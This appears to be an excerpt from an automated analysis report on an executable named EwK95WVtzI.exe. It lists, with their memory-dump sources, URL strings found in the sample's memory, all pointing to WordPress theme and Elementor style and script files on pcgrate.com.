                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1690560605
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1690560605
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1690560605
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1690560605
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=c08792de11d2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=c08792de11d2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=c08792de11d2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=c08792de11d2
